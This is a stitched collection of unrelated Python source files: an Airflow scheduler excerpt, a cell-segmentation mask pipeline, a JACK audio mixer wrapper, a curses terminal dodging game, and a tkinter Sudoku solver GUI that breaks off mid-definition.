# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
# for dag in dagbag.dags.values():
# dag.sync_to_db()
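# Use the bulk sync path below only when every DAG id in this file starts with
# "gemini_task_"; otherwise fall back to the per-DAG sync_to_db().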
is_gemini = set(map(lambda x: x.startswith("gemini_task_"), dagbag.dags.keys())) == {True}
if is_gemini:
self._sync_dags_to_db(dagbag)
else:
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = models.DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _sync_dags_to_db(self, dagbag: DagBag, session: Session=None) -> None:
'''
Sync gemini DAGs to the DB.
'''
orm_dags: List[DagModel] = session.query(DagModel).filter(DagModel.dag_id.in_(dagbag.dags.keys())).all()
orm_dag_ids = [dag.dag_id for dag in orm_dags]
new_orm_dags = []
start_time = time.time()
def _update_orm_dag(orm_dag: DagModel, dag: DAG) -> DagModel:
orm_dag.is_subdag = False
orm_dag.fileloc = dag.fileloc
orm_dag.owners = dag.owner
orm_dag.is_active = True
orm_dag.last_scheduler_run = timezone.utcnow()
orm_dag.default_view = dag._default_view
orm_dag.description = dag.description
orm_dag.schedule_interval = dag.schedule_interval
orm_dag.tags = []
return orm_dag
for orm_dag in orm_dags:
dag: DAG = dagbag.dags[orm_dag.dag_id]
new_orm_dags.append(_update_orm_dag(orm_dag, dag))
for dag in [dag for dag in dagbag.dags.values() if dag.dag_id not in orm_dag_ids]:
orm_dag = DagModel(dag_id=dag.dag_id)
self.log.info(f"Creating ORM DAG for {dag.dag_id}")
orm_dag.is_paused = True
new_orm_dags.append(_update_orm_dag(orm_dag, dag))
session.add_all(new_orm_dags)
session.commit()
self.log.info(f"sync to db DagModel took {round(time.time() - start_time, 2)} seconds")
start_time = time.time()
# Further optimization: the SerializedDagModel sync could be removed from the scheduler and handled instead by the API that takes tasks online/offline.
serialized_dags: List[SerializedDagModel] = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dagbag.dags.keys())
).with_entities(
SerializedDagModel.dag_id,
SerializedDagModel.dag_hash
).all()
serialized_dags_dict = {k: v for k, v in serialized_dags}
for dag in dagbag.dags.values():
# The main cost here is serializing the DAG
new_serialized_dag = SerializedDagModel(dag)
serialized_dag_hash = serialized_dags_dict.get(dag.dag_id)
if serialized_dag_hash and serialized_dag_hash == new_serialized_dag.dag_hash:
self.log.debug(f"Serialized DAG ({dag.dag_id}) is unchanged. Skipping writing to DB")
else:
self.log.info(f"serialized_dag_hash = {serialized_dag_hash}; new = {new_serialized_dag.dag_hash}")
self.log.info(f"Writing Serialized DAG: {dag.dag_id} to the DB")
session.merge(new_serialized_dag)
self.log.info(f"DAG: {dag.dag_id} written to the DB")
session.commit()
self.log.info(f"sync to db SerializedDagModel took {round(time.time() - start_time, 2)} seconds")
|
create_cell_mask.py
|
import pickle
import tempfile
import time
from multiprocessing import Process, Queue
from queue import Empty
from typing import Sequence
import blosc
import cv2
import fire
import hpacellseg.cellsegmentator as cellsegmentator
import numpy as np
import skimage
import torch
import torch.nn.functional as F
from hpacellseg.cellsegmentator import NORMALIZE
from tqdm import tqdm
from hpa.label_cell import label_cell_with_resized_pred
from hpa.reading import read_cellseg_input, read_gray
from somen.pfio_utility import DirectoryInZip, setup_forkserver
def _cv2_imwrite(directory: DirectoryInZip, path: str, image: np.ndarray) -> None:
with tempfile.NamedTemporaryFile(mode="wb", suffix=".png") as tmp_fp:
cv2.imwrite(tmp_fp.name, image)
with open(tmp_fp.name, "rb") as read_fp, directory.open(path, mode="wb") as write_fp:
write_fp.write(read_fp.read())
def _segmentation_worker(
in_queue: Queue, out_queue: Queue, input_directory: str, nuc_model: str, cell_model: str, batch_size: int
) -> None:
input_directory = DirectoryInZip(input_directory)
device = "cuda"
segmentator = cellsegmentator.CellSegmentator(
nuc_model,
cell_model,
scale_factor=0.25,
device=device,
padding=False,
multi_channel_model=True,
)
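# Reshape the normalization constants to (1, C, 1, 1) so they broadcast over NCHW batches.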
MEAN = torch.tensor(NORMALIZE["mean"], device=device)[np.newaxis, :, np.newaxis, np.newaxis]
STD = torch.tensor(NORMALIZE["std"], device=device)[np.newaxis, :, np.newaxis, np.newaxis]
done = False
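# Collect image ids until a full batch is assembled or the None sentinel signals that
# the work queue is exhausted.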
while not done:
image_ids = []
while len(image_ids) < batch_size:
image_id = in_queue.get()
if image_id is None:
done = True
break
image_ids.append(image_id)
if len(image_ids) == 0:
continue
uint_images = [read_cellseg_input(input_directory, image_id) for image_id in image_ids]
shapes = [image.shape[:2] for image in uint_images]
images = torch.tensor(
[np.moveaxis(skimage.transform.resize(image, (512, 512)), 2, 0) for image in uint_images],
device=device,
dtype=torch.float32,
)
images = (images - MEAN) / STD
with torch.no_grad():
nuc_seg = F.softmax(segmentator.nuclei_model(images[:, [2, 2, 2]]), dim=1)
nuc_seg[:, 0] = 0
nuc_seg = nuc_seg.detach().cpu().numpy()
nuc_seg = np.rint((nuc_seg * 255)).clip(0, 255).astype(np.uint8)
nuc_seg = np.moveaxis(nuc_seg, 1, 3)
cell_seg = F.softmax(segmentator.cell_model(images), dim=1)
cell_seg[:, 0] = 0
cell_seg = cell_seg.detach().cpu().numpy()
# For some unknown reason, restore_scaling_padding -> img_as_ubyte is applied to cell_seg,
# so we don't convert it to int here
cell_seg = np.moveaxis(cell_seg, 1, 3)
for i, image_id in enumerate(image_ids):
out_queue.put((image_id, cell_seg[i], nuc_seg[i], shapes[i]))
def _postprocess_worker(in_queue: Queue, out_queue: Queue, label_cell_scale_factor: float) -> None:
while True:
msg = in_queue.get()
if msg is None:
break
image_id, cell_seg, nuc_seg, orig_shape = msg
# If the resolution is too small, the result will differ noticeably due to integer rounding errors
# of `disk` in label_cell, so make it larger here than the size fed to the segmentator.
image_size = int(2048 * label_cell_scale_factor)
cell_seg = cv2.resize(cell_seg, (image_size, image_size), interpolation=cv2.INTER_AREA)
cell_seg = np.rint((cell_seg * 255)).clip(0, 255).astype(np.uint8)
nuc_seg = cv2.resize(nuc_seg, (image_size, image_size), interpolation=cv2.INTER_AREA)
_, cell_mask = label_cell_with_resized_pred(nuc_seg, cell_seg, label_cell_scale_factor)
assert 0 <= cell_mask.min() and cell_mask.max() <= 255
cell_mask = cell_mask.astype(np.uint8)
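# NOTE: cv2.resize expects (width, height) while orig_shape is (height, width);
# this only matters if the source images are not square.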
cell_mask = cv2.resize(cell_mask, orig_shape, interpolation=cv2.INTER_NEAREST_EXACT)
out_queue.put((image_id, cell_mask))
def create_cell_mask(
input_directory: str,
output_directory: str,
batch_size: int = 16,
num_segmentation_workers: int = 1,
num_postprocess_workers: int = 16,
label_cell_scale_factor: float = 1.0,
nuc_model: str = "../nuclei-model.pth",
cell_model: str = "../cell-model.pth",
) -> None:
input_directory = DirectoryInZip(input_directory)
output_directory = DirectoryInZip(output_directory)
image_id_queue, seg_queue, mask_queue = Queue(), Queue(maxsize=batch_size), Queue()
image_ids = np.unique(["_".join(filename.split("_")[:-1]) for filename in input_directory.listdir()])
image_ids = sorted(image_ids)
for image_id in image_ids:
image_id_queue.put(image_id)
segmentation_workers = []
for _ in range(num_segmentation_workers):
p = Process(
target=_segmentation_worker,
args=(image_id_queue, seg_queue, str(input_directory), nuc_model, cell_model, batch_size),
)
p.start()
segmentation_workers.append(p)
image_id_queue.put(None)
postprocess_workers = []
for _ in range(num_postprocess_workers):
p = Process(target=_postprocess_worker, args=(seg_queue, mask_queue, label_cell_scale_factor))
p.start()
postprocess_workers.append(p)
done_segmentation, done_postprocess = False, False
pbar = tqdm(total=len(image_ids))
while True:
try:
image_id, cell_mask = mask_queue.get_nowait()
_cv2_imwrite(output_directory, f"{image_id}.png", cell_mask)
pbar.update(1)
continue
except Empty:
pass
time.sleep(5)
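# Shutdown sequencing: once all segmentation workers have exited, send one None per
# postprocess worker; once those exit too and the mask queue is drained, stop.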
if not done_segmentation:
if all([not p.is_alive() for p in segmentation_workers]):
done_segmentation = True
for _ in postprocess_workers:
seg_queue.put(None)
elif not done_postprocess:
if all([not p.is_alive() for p in postprocess_workers]):
done_postprocess = True
else:
assert done_segmentation and done_postprocess
break
pbar.close()
def resize_cell_mask(input_directory: str, output_directory: str, image_size: int) -> None:
input_directory = DirectoryInZip(input_directory)
output_directory = DirectoryInZip(output_directory)
for path in tqdm(sorted(input_directory.listdir())):
cell_mask = read_gray(input_directory, path)
cell_mask = cv2.resize(cell_mask, (image_size, image_size), interpolation=cv2.INTER_NEAREST_EXACT)
_cv2_imwrite(output_directory, path, cell_mask)
def resize_image(input_directory: str, output_directory: str, image_size: int) -> None:
input_directory = DirectoryInZip(input_directory)
output_directory = DirectoryInZip(output_directory)
for path in tqdm(sorted(input_directory.listdir())):
img = read_gray(input_directory, path)
img = cv2.resize(img, (image_size, image_size))
_cv2_imwrite(output_directory, path, img)
def _crop_and_resize_cell_worker(
image_directory: str,
cell_mask_directory: str,
image_size: int,
in_queue: Queue,
out_queue: Queue,
) -> None:
image_directory = DirectoryInZip(image_directory)
cell_mask_directory = DirectoryInZip(cell_mask_directory)
while True:
msg = in_queue.get()
if msg is None:
break
image_id = msg
cell_mask = read_gray(cell_mask_directory, f"{image_id}.png")
assert cell_mask.ndim == 2
if (cell_mask == 0).all():
out_queue.put((image_id, None, []))
continue
cell_images = []
instance_indices = []
for instance_index in range(1, cell_mask.max() + 1):
instance_mask = cell_mask == instance_index
ys, xs = np.where(instance_mask)
if len(ys) == 0:
continue
instance_indices.append(instance_index)
whole_slice_y = slice(ys.min(), ys.max() + 1)
whole_slice_x = slice(xs.min(), xs.max() + 1)
images = {}
for color in ["red", "green", "blue", "yellow"]:
image = read_gray(image_directory, f"{image_id}_{color}.png")
assert image.shape == cell_mask.shape
images[color] = image
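# Weight pixel coordinates by the blue (nucleus) channel to locate the nucleus centroid of this cell.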
weight = images["blue"][ys, xs]
weight = weight / (weight.sum() + 1e-6)
center_y = int((weight * ys).sum())
center_x = int((weight * xs).sum())
# Crop around nuclei without resizing (not necessarily the whole cell)
def _get_nuclei_center_crop(src: np.ndarray) -> np.ndarray:
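# Copy an image_size x image_size window centered on the nucleus; any part of the
# window that falls outside the source image stays zero.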
dst_y_start = 0
src_y_start = center_y - image_size // 2 + 1
if src_y_start < 0:
dst_y_start = -src_y_start
src_y_start = 0
dst_x_start = 0
src_x_start = center_x - image_size // 2 + 1
if src_x_start < 0:
dst_x_start = -src_x_start
src_x_start = 0
dst_y_end = image_size
src_y_end = center_y + image_size // 2 + 1
if src_y_end >= cell_mask.shape[0]:
dst_y_end = image_size - (src_y_end - cell_mask.shape[0])
src_y_end = cell_mask.shape[0]
dst_x_end = image_size
src_x_end = center_x + image_size // 2 + 1
if src_x_end >= cell_mask.shape[1]:
dst_x_end = image_size - (src_x_end - cell_mask.shape[1])
src_x_end = cell_mask.shape[1]
dst = np.zeros((image_size, image_size), dtype=src.dtype)
dst[dst_y_start:dst_y_end, dst_x_start:dst_x_end] = src[src_y_start:src_y_end, src_x_start:src_x_end]
return dst
# Crop whole cell with resizing
def _get_resized_whole_crop(src: np.ndarray) -> np.ndarray:
whole_crop = src[whole_slice_y, whole_slice_x]
h, w = whole_crop.shape
ratio = image_size / max(h, w)
h_new, w_new = int(h * ratio), int(w * ratio)
assert h_new <= image_size and w_new <= image_size
resized = np.zeros((image_size, image_size), dtype=image.dtype)
y_start = (image_size - h_new) // 2
x_start = (image_size - w_new) // 2
# NOTE: cv2.resize uses it in (x, y) order, so it becomes (w_new, h_new)
resized[y_start : y_start + h_new, x_start : x_start + w_new] = cv2.resize(whole_crop, (w_new, h_new))
return resized
for color in ["red", "green", "blue", "yellow"]:
image = images[color]
image = image * instance_mask
nuclei_center_crop = _get_nuclei_center_crop(image)
resized_whole_crop = _get_resized_whole_crop(image)
cell_images.append(nuclei_center_crop)
cell_images.append(resized_whole_crop)
cell_images = np.asarray(cell_images).reshape(-1, 4 * 2, image_size, image_size)
# Pack the array to reduce serialization cost over the queue (not sure how effective it is)
out_queue.put((image_id, blosc.pack_array(cell_images), instance_indices))
def crop_and_resize_cell(
image_directory: str, cell_mask_directory: str, output_directory: str, image_size: int, num_workers: int = 2
) -> None:
image_directory = DirectoryInZip(image_directory)
cell_mask_directory = DirectoryInZip(cell_mask_directory)
output_directory = DirectoryInZip(output_directory)
image_ids = np.unique([filename[: filename.rindex("_")] for filename in image_directory.listdir()])
image_ids = sorted(image_ids)
in_queue, out_queue = Queue(), Queue(maxsize=128)
for image_id in image_ids:
in_queue.put(image_id)
for _ in range(num_workers):
in_queue.put(None)
workers = []
for _ in range(num_workers):
p = Process(
target=_crop_and_resize_cell_worker,
args=(str(image_directory), str(cell_mask_directory), image_size, in_queue, out_queue),
)
p.start()
workers.append(p)
done = False
instance_indices_by_id = {}
pbar = tqdm(total=len(image_ids))
while True:
try:
image_id, cell_images, instance_indices = out_queue.get_nowait()
if len(instance_indices) > 0:
assert cell_images is not None
cell_images = blosc.unpack_array(cell_images)
assert len(instance_indices) == cell_images.shape[0]
for i, instance_index in enumerate(instance_indices):
with output_directory.open(f"{image_id}_{instance_index}.blosc", mode="wb") as fp:
fp.write(blosc.pack_array(cell_images[i]))
instance_indices_by_id[image_id] = instance_indices
pbar.update(1)
continue
except Empty:
pass
time.sleep(1)
if not done:
if all([not p.is_alive() for p in workers]):
done = True
# Don't break, run the while loop again until get_nowait fails
else:
break
pbar.close()
with output_directory.open("instance_indices_by_id.pkl", "wb") as fp:
pickle.dump(instance_indices_by_id, fp, pickle.HIGHEST_PROTOCOL)
if __name__ == "__main__":
setup_forkserver()
fire.Fire(
{
"create_cell_mask": create_cell_mask,
"resize_cell_mask": resize_cell_mask,
"resize_image": resize_image,
"crop_and_resize_cell": crop_and_resize_cell,
}
)
|
mixer.py
|
import threading
import traceback
import subprocess
import socket
import time
from . import base
import math
class Mixer(base.Object):
def __init__(self, name, gain=1.0):
self.name = name
self.gain = self.calc_gain(gain)
self.in_ports = []
self.in_ports.append("%s:in_left" % self.name)
self.in_ports.append("%s:in_right" % self.name)
self.out_ports = []
self.out_ports.append("%s:out_left" % self.name)
self.out_ports.append("%s:out_right" % self.name)
base.Object.__init__(self)
def run(self):
def target():
while self.running:
try:
self.process = subprocess.Popen(["/opt/jackie/bin/jacknanomix", "-n", self.name], stdin=subprocess.PIPE)
self.process.stdin.write(b"%.2f\n" % self.gain)
self.process.stdin.flush()
self.process.wait()
self.status = self.process.returncode
except:
traceback.print_exc()
self.error = "exception"
self.status = -1
if self.running:
time.sleep(5)
self.thread = threading.Thread(target=target)
self.thread.start()
def calc_gain(self, gain):
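# Map a linear fader value in [0, 1] onto a steeper double-exponential curve; each
# stage is normalized by (e - 1) so that 0 maps to 0 and 1 maps to 1.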
return (math.exp((math.exp(gain)-1) / (math.e - 1))-1) / (math.e - 1)
# return (math.exp(gain)-1) / (math.e - 1)
def set_gain(self, gain):
self.gain = self.calc_gain(gain)
self.process.stdin.write(b"%.2f\n" % self.gain)
self.process.stdin.flush()
def stop(self):
self.running = False
if self.thread.is_alive():
self.process.terminate()
self.process.kill()
self.thread.join()
return self.status
|
main.py
|
import curses
import random
import argparse
import time
import threading
import sys
# ---------------------------------------
# Initialize Variables and Strings
# ---------------------------------------
# Dropping Speed
SPEED = [1, 0.8, 0.6, 0.4, 0.2, 0.1, 0.07, 0.05, 0.03, 0.01]
def init():
global obstacles_list, ship_location, status_bar_str, args, difficulty, end_flag, score
args = set_argument()
obstacles_list = []
# True If Game Over
end_flag = False
score = 0
ship_location = args.width // 2
difficulty = SPEED[args.difficulty-1]
status_bar_str = "Press 'q' to exit | Size: " + str(args.width) + "x" + str(args.height) + " | Difficulty: " + str(args.difficulty) + " | Score: "
# Command-Line Argument Parse
def set_argument():
parser = argparse.ArgumentParser(
description="Playing Spaceship Dodging Game in Terminal!",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("--height", action='store', default=24, type=height_type, help="Set the height of the screen [height > 7]")
parser.add_argument("--width", action='store', default=80, type=width_type, help="Set the width of the screen")
parser.add_argument("--difficulty", action='store', default=1, type=difficulty_type, help="Set the difficulty[1-10] of the game, increase the speed of dropping obstacles")
return parser.parse_args()
# Customize Type Function
def height_type(x):
x = int(x)
if x < 7:
raise argparse.ArgumentTypeError("Height must be greater than 7 [height > 7]")
return x
def width_type(x):
x = int(x)
if x < 65:
raise argparse.ArgumentTypeError("Width must be greater than 65 [width > 65]")
return x
def difficulty_type(x):
x = int(x)
if x < 1 or x > 10:
raise argparse.ArgumentTypeError("Difficulty must be between 1 and 10 [1-10]")
return x
# ---------------------------------------
# ---------------------------------------
# Render Functions
# ---------------------------------------
# Render Information When Game End
def render_end_game(stdscr, rows, cols):
global score, end_flag
# Hit Warning
stdscr.attron(curses.color_pair(2))
stdscr.addch(rows-2, ship_location, "*")
stdscr.addch(rows-3, ship_location, "X")
stdscr.attroff(curses.color_pair(2))
# Middle Information Window
str_1 = " GAME OVER! "
str_2 = " Your Score: " + str(score) + " "
str_3 = " Press 'q' to exit, 'r' to restart "
_y = int((rows // 2) - 2)
_x_1 = int((cols // 2) - (len(str_1) // 2) - len(str_1) % 2)
_x_2 = int((cols // 2) - (len(str_2) // 2) - len(str_2) % 2)
_x_3 = int((cols // 2) - (len(str_3) // 2) - len(str_3) % 2)
for i in range(-1, 4):
for j in range( (_x_3-2), (_x_3-2) + len(str_3) + 4):
stdscr.addch(_y + i, j , "/")
stdscr.attron(curses.color_pair(1))
stdscr.addstr(_y , _x_1 , str_1)
stdscr.addstr(_y + 1, _x_2 , str_2)
stdscr.addstr(_y + 2, _x_3 , str_3)
stdscr.attroff(curses.color_pair(1))
stdscr.refresh()
# Key Event
while True:
key = stdscr.getch()
if key == ord('q'):
curses.endwin()
sys.exit()
elif key == ord('r'):
init()
return
# Render Status Bar on the Bottom
def render_status_bar(stdscr, rows, cols):
global status_bar_str, score
stdscr.attron(curses.color_pair(3))
stdscr.addstr(rows-1, 0, status_bar_str + str(score))
stdscr.addstr(rows-1, len(status_bar_str + str(score)), " " * (cols - len(status_bar_str + str(score)) - 1))
stdscr.attroff(curses.color_pair(3))
# Main Render Function
def rendering(stdscr):
global obstacles_list, ship_location, end_flag
rows, cols = stdscr.getmaxyx()
if end_flag:
render_end_game(stdscr, rows, cols)
else:
stdscr.erase()
# Render Scene
index = 0
for i in reversed(obstacles_list):
for j in i:
stdscr.addch(index, j, "-")
index += 1
stdscr.addch(rows - 2, ship_location, "*")
render_status_bar(stdscr, rows, cols)
stdscr.refresh()
# ---------------------------------------
# ---------------------------------------
# Thread Target Function
# ---------------------------------------
def update_obstacles():
global obstacles_list, ship_location, end_flag, score, args, difficulty
while True:
# Generate Obstacle
obstacles = random.sample(range(0, args.width), 5)
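# When the list spans the playfield, the oldest row has reached the ship's row:
# pop it, award points, and end the game if the ship occupies one of its columns.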
if len(obstacles_list) >= args.height-2:
target = obstacles_list[0]
obstacles_list.pop(0)
score += args.difficulty
if ship_location in target:
end_flag = True
obstacles_list.append(obstacles)
# Dropping Speed
time.sleep(difficulty)
# ---------------------------------------
# ---------------------------------------
# Main Scene(screen/curses) Function
# ---------------------------------------
def run(stdscr):
global ship_location, args
# Scene Initialize & Setting
stdscr = curses.initscr()
stdscr.resize(args.height, args.width)
stdscr.nodelay(True)
curses.curs_set(0)
curses.noecho()
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
th_update.start()
while True:
# Render Starting
rendering(stdscr)
# FPS
time.sleep(0.001)
# Key event
key = stdscr.getch()
if key == ord('q'):
break
elif key == curses.KEY_LEFT:
if(ship_location > 0):
ship_location -= 1
elif key == curses.KEY_RIGHT:
if(ship_location < args.width-1):
ship_location += 1
else:
pass
curses.endwin()
# ---------------------------------------
if __name__ == '__main__':
init()
# Obstacle dropping thread
th_update = threading.Thread(target=update_obstacles, daemon=True)
curses.wrapper(run)
|
gui.py
|
from tkinter import *
from timeit import default_timer as timer
from tkinter import messagebox
import threading
import copy
from sudokucsp import SudokuCSP
# if you want to verify that my csp.py does a better job just change
# from csp import ... to from original import ... , original is the csp.py file from AIMA code
from csp import backtracking_search, mrv, unordered_domain_values, forward_checking, mac, no_inference
MARGIN = 20 # Pixels around the board
SIDE = 50 # Width of every board cell
WIDTH_B = HEIGHT_B = MARGIN * 2 + SIDE * 9 # Width and height of the whole board
WIDTH = WIDTH_B + 180 # Width of board and buttons solve and reset
class SudokuUI(Frame):
def __init__(self, parent):
self.parent = parent
# we start with a blank board
self.original_board = [[0 for j in range(9)] for i in range(9)]
# of course we also need another board on which to show the solution
self.current_board = copy.deepcopy(self.original_board)
Frame.__init__(self, parent)
self.row, self.col = 0, 0
self.__initUI()
def __initUI(self):
# initialize the widgets that will be shown in the GUI
self.pack(fill=BOTH, expand=1)
self.canvas = Canvas(self, width=WIDTH_B, height=HEIGHT_B)
self.canvas.pack(fill=BOTH, side=TOP)
self.canvas.grid(row=0, column=0, rowspan=30, columnspan=60)
# level is used to select the level of the board: 1 means easy and 2 means hard
self.level = IntVar(value=1)
# which selects which board to use at the chosen level; there are 3 boards per level
self.which = 0
# we will need a StringVar so that the client can see the time used by an algorithm
self.time = StringVar()
self.time.set("Time: ")
# same for number of backtracks
self.n_bt = StringVar()
self.n_bt.set("N. BT: ")
self.make_menu()
# the default will be the board of lvl 1 and which 1
self.__change_level()
self.clear_button = Button(self, text="Reset", command=self.__clear_board, width=15, height=5)
self.clear_button.grid(row=10, column=61, padx=20, columnspan=3)
self.solve_button = Button(self, text="Solve", command=self.solve_clicked, width=15, height=5)
self.solve_button.grid(row=13, column=61, padx=20, columnspan=3)
lbltime = Label(self, textvariable=self.time)
lblBT = Label(self, textvariable=self.n_bt)
Label(self, text="Inference: ").grid(row=14, column=61)
lbltime.grid(row=30, column=0)
lblBT.grid(row=32, column=0)
self.inference = StringVar()
self.radio = []
self.radio.append(Radiobutton(self, text="No Inference", variable=self.inference, value="NO_INFERENCE"))
self.radio[0].grid(row=15, column=62, padx=2)
self.radio.append(Radiobutton(self, text="FC ", variable=self.inference, value="FC"))
self.radio[1].grid(row=16, column=62)
self.radio.append(Radiobutton(self, text="MAC ", variable=self.inference, value="MAC"))
self.radio[2].grid(row=17, column=62)
self.inference.set("NO_INFERENCE")
Label(self, text="Variable to choose:").grid(row=18, column=61)
lbltime.grid(row=30, column=0)
lblBT.grid(row=32, column=0)
self.var_to_choose = StringVar()
self.radio.append(Radiobutton(self, text="MRV", variable=self.var_to_choose, value="MRV"))
self.radio[3].grid(row=20, column=62)
self.var_to_choose.set("MRV")
self.__draw_grid()
self.__draw_puzzle()
def solve_clicked(self):
# we are searching for a solution so it is good to disable buttons
for rb in self.radio:
rb.config(state=DISABLED)
self.clear_button.config(state=DISABLED)
self.solve_button.config(state=DISABLED)
self.menu_bar.entryconfig("Level", state="disabled")
p = threading.Thread(target=self.solve_sudoku)
p.start()
messagebox.showinfo("Working", "We are looking for a solution, please wait some seconds ...")
def solve_sudoku(self):
s = SudokuCSP(self.current_board)
inf, dv, suv = None, None, None
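# Map the selected radio options onto the corresponding search functions imported from csp
# (dv is unused here; unordered_domain_values is passed directly to backtracking_search below).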
if self.inference.get() == "NO_INFERENCE":
inf = no_inference
elif self.inference.get() == "FC":
inf = forward_checking
elif self.inference.get() == "MAC":
inf = mac
if self.var_to_choose.get() == "MRV":
suv = mrv
start = timer()
a = backtracking_search(s, select_unassigned_variable=suv, order_domain_values=unordered_domain_values,
inference=inf)
end = timer()
# if a is not None we found a solution and show it on the current board;
# if a is None we tell the user that the initial board
# violates some constraints
if a:
for i in range(9):
for j in range(9):
index = i * 9 + j
self.current_board[i][j] = a.get("CELL" + str(index))
else:
messagebox.showerror("Error", "Invalid sudoku puzzle, please check the initial state")
# showing solution
self.__draw_puzzle()
self.time.set("Time: "+str(round(end-start, 5))+" seconds")
self.n_bt.set("N. BT: "+str(s.n_bt))
# re-enable the buttons so a new search can be started
for rb in self.radio:
rb.config(state=NORMAL)
self.clear_button.config(state=NORMAL)
self.solve_button.config(state=NORMAL)
self.menu_bar.entryconfig("Level", state="normal")
def make_menu(self):
# creating menu with level Easy and Hard
self.menu_bar = Menu(self.parent)
self.parent.configure(menu=self.menu_bar)
level_menu = Menu(self.menu_bar, tearoff=False)
self.menu_bar.add_cascade(label="Level", menu=level_menu)
level_menu.add_radiobutton(label="Easy", variable=self.level, value=1, command=self.__change_level)
level_menu.add_radiobutton(label="Hard", variable=self.level, value=2, command=self.__change_level)
def __change_level(self):
# to add a new board, you just have to change %3 to %4 and then add another
# clause elif like "elif self.which == 3:"
self.which = (self.which+1) % 3
if self.level.get() == 1:
if self.which == 0:
self.original_board[0] = [0, 6, 0, 3, 0, 0, 8, 0, 4]
self.original_board[1] = [5, 3, 7, 0, 9, 0, 0, 0, 0]
self.original_board[2] = [0, 4, 0, 0, 0, 6, 0, 0, 7]
self.original_board[3] = [0, 9, 0, 0, 5, 0, 0, 0, 0]
self.original_board[4] = [0, 0, 0, 0, 0, 0, 0, 0, 0]
self.original_board[5] = [7, 1, 3, 0, 2, 0, 0, 4, 0]
self.original_board[6] = [3, 0, 6, 4, 0, 0, 0, 1, 0]
self.original_board[7] = [0, 0, 0, 0, 6, 0, 5, 2, 3]
self.original_board[8] = [1, 0, 2, 0, 0, 9, 0, 8, 0]
elif self.which == 1:
self.original_board[0] = [7, 9, 0, 4, 0, 2, 3, 8, 1]
self.original_board[1] = [5, 0, 3, 0, 0, 0, 9, 0, 0]
self.original_board[2] = [0, 0, 0, 0, 3, 0, 0, 7, 0]
self.original_board[3] = [0, 0, 0, 0, 0, 5, 0, 0, 2]
